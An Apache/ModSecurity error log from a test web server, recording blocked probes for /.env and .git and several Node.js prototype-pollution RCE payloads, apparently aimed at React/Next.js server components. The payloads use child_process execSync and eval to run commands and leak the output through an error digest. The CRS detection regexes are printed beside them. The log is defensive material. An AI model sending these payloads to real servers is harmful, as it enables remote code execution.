[Wed Dec 24 03:10:26.715557 2025] [:error] [pid 942101] [client 158.51.121.183:14946] [client 158.51.121.183] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app_dev.php/_profiler/open"] [unique_id "aUtLko3b3LRkWYPRjITTbQAAAAI"]
[Wed Dec 24 03:10:26.715722 2025] [:error] [pid 942101] [client 158.51.121.183:14946] [client 158.51.121.183] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app_dev.php/_profiler/open"] [unique_id "aUtLko3b3LRkWYPRjITTbQAAAAI"]
[Wed Dec 24 11:19:22.533990 2025] [authz_core:error] [pid 942137] [client 138.197.102.217:35316] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Thu Dec 25 15:03:37.211371 2025] [:error] [pid 964249] [client 54.171.119.177:37182] [client 54.171.119.177] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aU1EOdt8xMcTBghmXKuT1QAAABM"]
[Thu Dec 25 15:03:37.213144 2025] [:error] [pid 964249] [client 54.171.119.177:37182] [client 54.171.119.177] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aU1EOdt8xMcTBghmXKuT1QAAABM"]
[Thu Dec 25 15:03:37.214439 2025] [:error] [pid 964249] [client 54.171.119.177:37182] [client 54.171.119.177] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aU1EOdt8xMcTBghmXKuT1QAAABM"]
[Thu Dec 25 15:03:37.214602 2025] [:error] [pid 964249] [client 54.171.119.177:37182] [client 54.171.119.177] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aU1EOdt8xMcTBghmXKuT1QAAABM"]
[Thu Dec 25 16:34:12.927506 2025] [:error] [pid 964235] [client 54.178.84.236:53012] [client 54.178.84.236] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aU1ZdLwXLJzCQjhMY5aYVgAAAAY"]
[Thu Dec 25 16:34:12.928098 2025] [:error] [pid 964235] [client 54.178.84.236:53012] [client 54.178.84.236] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aU1ZdLwXLJzCQjhMY5aYVgAAAAY"]
[Thu Dec 25 16:34:12.929328 2025] [:error] [pid 964235] [client 54.178.84.236:53012] [client 54.178.84.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aU1ZdLwXLJzCQjhMY5aYVgAAAAY"]
[Thu Dec 25 16:34:12.929487 2025] [:error] [pid 964235] [client 54.178.84.236:53012] [client 54.178.84.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aU1ZdLwXLJzCQjhMY5aYVgAAAAY"]
[Thu Dec 25 18:46:47.027887 2025] [:error] [pid 964237] [client 204.76.203.25:39714] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aU14h_W7LvgXGQX87MiXbAAAAAg"]
[Thu Dec 25 18:46:47.028207 2025] [:error] [pid 964237] [client 204.76.203.25:39714] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aU14h_W7LvgXGQX87MiXbAAAAAg"]
[Thu Dec 25 18:46:47.028375 2025] [:error] [pid 964237] [client 204.76.203.25:39714] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aU14h_W7LvgXGQX87MiXbAAAAAg"]
[Wed Dec 31 09:47:57.943435 2025] [:error] [pid 1096229] [client 204.76.203.25:54892] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVTjPfQKzXypmCfOdoSIwgAAAB0"]
[Wed Dec 31 09:47:57.944767 2025] [:error] [pid 1096229] [client 204.76.203.25:54892] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVTjPfQKzXypmCfOdoSIwgAAAB0"]
[Wed Dec 31 09:47:57.944944 2025] [:error] [pid 1096229] [client 204.76.203.25:54892] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVTjPfQKzXypmCfOdoSIwgAAAB0"]
[Sun Jan 04 10:37:32.058808 2026] [:error] [pid 1182471] [client 206.189.50.147:33524] [client 206.189.50.147] ModSecurity: Rule 7f7d58167898 [id "932110"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "258"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aVo03HyvUtdQTzCPr08ScAAAAAA"]
[Sun Jan 04 10:37:32.060059 2026] [:error] [pid 1182471] [client 206.189.50.147:33524] [client 206.189.50.147] ModSecurity: Rule 7f7d5815c760 [id "932115"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "298"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aVo03HyvUtdQTzCPr08ScAAAAAA"]
[Sun Jan 04 10:37:32.061657 2026] [:error] [pid 1182471] [client 206.189.50.147:33524] [client 206.189.50.147] ModSecurity: Warning. Pattern match "(?i)\\\\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create| ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "350"] [id "933160"] [msg "PHP Injection Attack: High-Risk PHP Function Call Found"] [data "Matched Data: eval(user_code); Promise.resolve(val).then(function(v) { var res_str = (typeof v === 'object') ? JSON.stringify(v) : String(v); try { res_str = zlib.deflateSync(res_str); } catch(e) {} var res_hex = global[String.fromCharCode(66,117,102,102,101,114)].from(res_str).toString('hex'); reject(Object.assign(new Error('RCE_RES'), { digest: res_hex })); }).catch(function(e) { reject(Object.assign(new Er..."] [severity "CRITICAL"] [ver "OWASP_C [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aVo03HyvUtdQTzCPr08ScAAAAAA"]
[Sun Jan 04 10:37:32.061788 2026] [:error] [pid 1182471] [client 206.189.50.147:33524] [client 206.189.50.147] ModSecurity: Rule 7f7d57dadbf8 [id "933210"][file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"][line "504"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aVo03HyvUtdQTzCPr08ScAAAAAA"]
[Sun Jan 04 10:37:32.061938 2026] [:error] [pid 1182471] [client 206.189.50.147:33524] [client 206.189.50.147] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: String.fromCharCode found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var reject_bridge = arguments[1]; (Promise.all([Function('return import(\\x5c\\x22node:child_process\\x5c\\x22)')(), Function('return import(\\x5c\\x22node:zlib\\x5c\\x22)')()]).then(([cp, zlib]) => { return new Promise((resolve, reject) => { ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aVo03HyvUtdQTzCPr08ScAAAAAA"]
[Sun Jan 04 10:37:32.062072 2026] [:error] [pid 1182471] [client 206.189.50.147:33524] [client 206.189.50.147] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: String.fromCharCode found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var reject_bridge = arguments[1]; (Promise.all([Function('return import(\\x5c\\x22node:child_process\\x5c\\x22)')(), Function('return import(\\x5c\\x22node:zlib\\x5c\\x22)')()]).then(([cp, zlib]) => { return new Promise((resolve, reject) => { ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aVo03HyvUtdQTzCPr08ScAAAAAA"]
[Sun Jan 04 10:37:32.063742 2026] [:error] [pid 1182471] [client 206.189.50.147:33524] [client 206.189.50.147] ModSecurity: Rule 7f7d589df320 [id "941140"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "179"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aVo03HyvUtdQTzCPr08ScAAAAAA"]
[Sun Jan 04 10:37:32.063871 2026] [:error] [pid 1182471] [client 206.189.50.147:33524] [client 206.189.50.147] ModSecurity: Rule 7f7d589d6030 [id "941160"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "218"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aVo03HyvUtdQTzCPr08ScAAAAAA"]
[Sun Jan 04 10:37:32.070225 2026] [:error] [pid 1182471] [client 206.189.50.147:33524] [client 206.189.50.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aVo03HyvUtdQTzCPr08ScAAAAAA"]
[Sun Jan 04 10:37:32.070400 2026] [:error] [pid 1182471] [client 206.189.50.147:33524] [client 206.189.50.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aVo03HyvUtdQTzCPr08ScAAAAAA"]
[Tue Jan 06 02:30:04.663245 2026] [:error] [pid 1223534] [client 204.76.203.25:47464] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVxlnKquKB7It2jaKpZFzwAAAAQ"]
[Tue Jan 06 02:30:04.664400 2026] [:error] [pid 1223534] [client 204.76.203.25:47464] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVxlnKquKB7It2jaKpZFzwAAAAQ"]
[Tue Jan 06 02:30:04.664572 2026] [:error] [pid 1223534] [client 204.76.203.25:47464] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVxlnKquKB7It2jaKpZFzwAAAAQ"]
[Tue Jan 06 23:24:34.174809 2026] [:error] [pid 1225968] [client 194.195.116.230:48978] [client 194.195.116.230] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: $((41*271))) found within ARGS:0: {then:$1:__proto__:then status:resolved_model reason:-1 value:{then:$b1337} _response:{_prefix:var res=process.mainmodule.require(child_process).execsync(echo $((41*271))).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks:$q2 _formdata:{get:$1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aV2LooZT-fYnkUisYDJkmAAAAAM"]
[Tue Jan 06 23:24:34.176166 2026] [:error] [pid 1225968] [client 194.195.116.230:48978] [client 194.195.116.230] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aV2LooZT-fYnkUisYDJkmAAAAAM"]
[Tue Jan 06 23:24:34.176348 2026] [:error] [pid 1225968] [client 194.195.116.230:48978] [client 194.195.116.230] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aV2LooZT-fYnkUisYDJkmAAAAAM"]
[Thu Jan 08 07:31:36.843316 2026] [:error] [pid 1270042] [client 15.161.54.129:45104] [client 15.161.54.129] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aV9PSC7RlX2cRjHcFz6w-QAAAAY"]
[Thu Jan 08 07:31:36.845083 2026] [:error] [pid 1270042] [client 15.161.54.129:45104] [client 15.161.54.129] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aV9PSC7RlX2cRjHcFz6w-QAAAAY"]
